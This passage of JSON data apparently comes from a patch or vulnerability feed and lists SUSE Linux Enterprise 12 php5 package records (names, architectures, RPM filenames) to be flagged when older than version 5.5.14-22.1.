{"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-mcrypt-debuginfo-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-mcrypt-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-mcrypt-5.5.14-22.1.x86_64.rpm", "packageName": "php5-mcrypt", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-sqlite-5.5.14-22.1.s390x.rpm", "packageName": "php5-sqlite", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-pgsql-debuginfo-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-pgsql-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-pgsql-debuginfo-5.5.14-22.1.x86_64.rpm", "packageName": "php5-pgsql-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-mbstring-debuginfo-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-mbstring-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-xsl-5.5.14-22.1.s390x.rpm", "packageName": "php5-xsl", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-fpm-debuginfo-5.5.14-22.1.s390x.rpm", "packageName": "php5-fpm-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-exif-debuginfo-5.5.14-22.1.s390x.rpm", "packageName": "php5-exif-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-ftp-5.5.14-22.1.s390x.rpm", "packageName": "php5-ftp", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-mysql-5.5.14-22.1.s390x.rpm", "packageName": "php5-mysql", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-xmlwriter-debuginfo-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-xmlwriter-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-curl-debuginfo-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-curl-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-dom-5.5.14-22.1.x86_64.rpm", "packageName": "php5-dom", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-openssl-debuginfo-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-openssl-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-ctype-debuginfo-5.5.14-22.1.s390x.rpm", "packageName": "php5-ctype-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-gd-debuginfo-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-gd-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-dom-debuginfo-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-dom-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-enchant-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-enchant", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-odbc-5.5.14-22.1.x86_64.rpm", "packageName": "php5-odbc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-tokenizer-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-tokenizer", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-shmop-5.5.14-22.1.x86_64.rpm", "packageName": "php5-shmop", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-intl-debuginfo-5.5.14-22.1.s390x.rpm", "packageName": "php5-intl-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-enchant-5.5.14-22.1.x86_64.rpm", "packageName": "php5-enchant", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-gd-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-gd", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-suhosin-debuginfo-5.5.14-22.1.x86_64.rpm", "packageName": "php5-suhosin-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-ctype-5.5.14-22.1.x86_64.rpm", "packageName": "php5-ctype", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-pcntl-5.5.14-22.1.x86_64.rpm", "packageName": "php5-pcntl", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-pdo-5.5.14-22.1.x86_64.rpm", "packageName": "php5-pdo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-sockets-5.5.14-22.1.s390x.rpm", "packageName": "php5-sockets", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-zip-debuginfo-5.5.14-22.1.x86_64.rpm", "packageName": "php5-zip-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-fileinfo-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-fileinfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-sysvmsg-5.5.14-22.1.s390x.rpm", "packageName": "php5-sysvmsg", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-zip-5.5.14-22.1.s390x.rpm", "packageName": "php5-zip", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-soap-debuginfo-5.5.14-22.1.x86_64.rpm", "packageName": "php5-soap-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-xmlwriter-5.5.14-22.1.x86_64.rpm", "packageName": "php5-xmlwriter", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-curl-5.5.14-22.1.x86_64.rpm", "packageName": "php5-curl", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-xsl-5.5.14-22.1.x86_64.rpm", "packageName": "php5-xsl", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-debuginfo-5.5.14-22.1.s390x.rpm", "packageName": "php5-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-xmlrpc-debuginfo-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-xmlrpc-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-pspell-debuginfo-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-pspell-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-bcmath-debuginfo-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-bcmath-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-debuginfo-5.5.14-22.1.x86_64.rpm", "packageName": "php5-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-shmop-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-shmop", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-fastcgi-5.5.14-22.1.x86_64.rpm", "packageName": "php5-fastcgi", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-gmp-debuginfo-5.5.14-22.1.s390x.rpm", "packageName": "php5-gmp-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-gmp-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-gmp", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-soap-5.5.14-22.1.s390x.rpm", "packageName": "php5-soap", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-sqlite-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-sqlite", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-sysvmsg-debuginfo-5.5.14-22.1.x86_64.rpm", "packageName": "php5-sysvmsg-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-xmlreader-5.5.14-22.1.x86_64.rpm", "packageName": "php5-xmlreader", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-wddx-debuginfo-5.5.14-22.1.s390x.rpm", "packageName": "php5-wddx-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-shmop-debuginfo-5.5.14-22.1.x86_64.rpm", "packageName": "php5-shmop-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-debugsource-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-ctype-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-ctype", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-ldap-debuginfo-5.5.14-22.1.s390x.rpm", "packageName": "php5-ldap-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-fileinfo-debuginfo-5.5.14-22.1.x86_64.rpm", "packageName": "php5-fileinfo-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-iconv-5.5.14-22.1.s390x.rpm", "packageName": "php5-iconv", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-gettext-debuginfo-5.5.14-22.1.s390x.rpm", "packageName": "php5-gettext-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-enchant-debuginfo-5.5.14-22.1.x86_64.rpm", "packageName": "php5-enchant-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-curl-debuginfo-5.5.14-22.1.s390x.rpm", "packageName": "php5-curl-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-fpm-debuginfo-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-fpm-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "apache2-mod_php5-debuginfo-5.5.14-22.1.ppc64le.rpm", "packageName": "apache2-mod_php5-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-bz2-debuginfo-5.5.14-22.1.s390x.rpm", "packageName": "php5-bz2-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-fastcgi-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-fastcgi", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-pspell-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-pspell", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-fileinfo-5.5.14-22.1.s390x.rpm", "packageName": "php5-fileinfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-bcmath-debuginfo-5.5.14-22.1.s390x.rpm", "packageName": "php5-bcmath-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-calendar-debuginfo-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-calendar-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-calendar-debuginfo-5.5.14-22.1.x86_64.rpm", "packageName": "php5-calendar-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-xmlreader-debuginfo-5.5.14-22.1.s390x.rpm", "packageName": "php5-xmlreader-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-tokenizer-debuginfo-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-tokenizer-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-snmp-debuginfo-5.5.14-22.1.s390x.rpm", "packageName": "php5-snmp-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-gettext-debuginfo-5.5.14-22.1.x86_64.rpm", "packageName": "php5-gettext-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-curl-debuginfo-5.5.14-22.1.x86_64.rpm", "packageName": "php5-curl-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-bz2-5.5.14-22.1.x86_64.rpm", "packageName": "php5-bz2", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-suhosin-5.5.14-22.1.s390x.rpm", "packageName": "php5-suhosin", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-openssl-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-openssl", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-ldap-5.5.14-22.1.x86_64.rpm", "packageName": "php5-ldap", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-pdo-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-pdo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-zlib-debuginfo-5.5.14-22.1.x86_64.rpm", "packageName": "php5-zlib-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-sysvsem-debuginfo-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-sysvsem-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-gettext-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-gettext", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-mysql-debuginfo-5.5.14-22.1.s390x.rpm", "packageName": "php5-mysql-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-suhosin-5.5.14-22.1.x86_64.rpm", "packageName": "php5-suhosin", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-sockets-debuginfo-5.5.14-22.1.s390x.rpm", "packageName": "php5-sockets-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-exif-debuginfo-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-exif-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-zlib-debuginfo-5.5.14-22.1.s390x.rpm", "packageName": "php5-zlib-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-dba-debuginfo-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-dba-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-mysql-debuginfo-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-mysql-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-xmlreader-debuginfo-5.5.14-22.1.x86_64.rpm", "packageName": "php5-xmlreader-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-sockets-debuginfo-5.5.14-22.1.x86_64.rpm", "packageName": "php5-sockets-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-curl-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-curl", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-fastcgi-debuginfo-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-fastcgi-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-tokenizer-debuginfo-5.5.14-22.1.s390x.rpm", "packageName": "php5-tokenizer-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-wddx-debuginfo-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-wddx-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-xmlreader-5.5.14-22.1.s390x.rpm", "packageName": "php5-xmlreader", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-bz2-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-bz2", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-openssl-5.5.14-22.1.x86_64.rpm", "packageName": "php5-openssl", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-xmlwriter-debuginfo-5.5.14-22.1.s390x.rpm", "packageName": "php5-xmlwriter-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-tokenizer-debuginfo-5.5.14-22.1.x86_64.rpm", "packageName": "php5-tokenizer-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-ctype-5.5.14-22.1.s390x.rpm", "packageName": "php5-ctype", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-ldap-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-ldap", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-sysvmsg-debuginfo-5.5.14-22.1.s390x.rpm", "packageName": "php5-sysvmsg-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-pcntl-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-pcntl", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-fastcgi-debuginfo-5.5.14-22.1.s390x.rpm", "packageName": "php5-fastcgi-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-dom-debuginfo-5.5.14-22.1.s390x.rpm", "packageName": "php5-dom-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-json-5.5.14-22.1.s390x.rpm", "packageName": "php5-json", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-odbc-debuginfo-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-odbc-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-wddx-5.5.14-22.1.x86_64.rpm", "packageName": "php5-wddx", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-openssl-5.5.14-22.1.s390x.rpm", "packageName": "php5-openssl", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-fpm-5.5.14-22.1.s390x.rpm", "packageName": "php5-fpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-dba-5.5.14-22.1.x86_64.rpm", "packageName": "php5-dba", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-sysvshm-debuginfo-5.5.14-22.1.x86_64.rpm", "packageName": "php5-sysvshm-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-snmp-5.5.14-22.1.x86_64.rpm", "packageName": "php5-snmp", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", 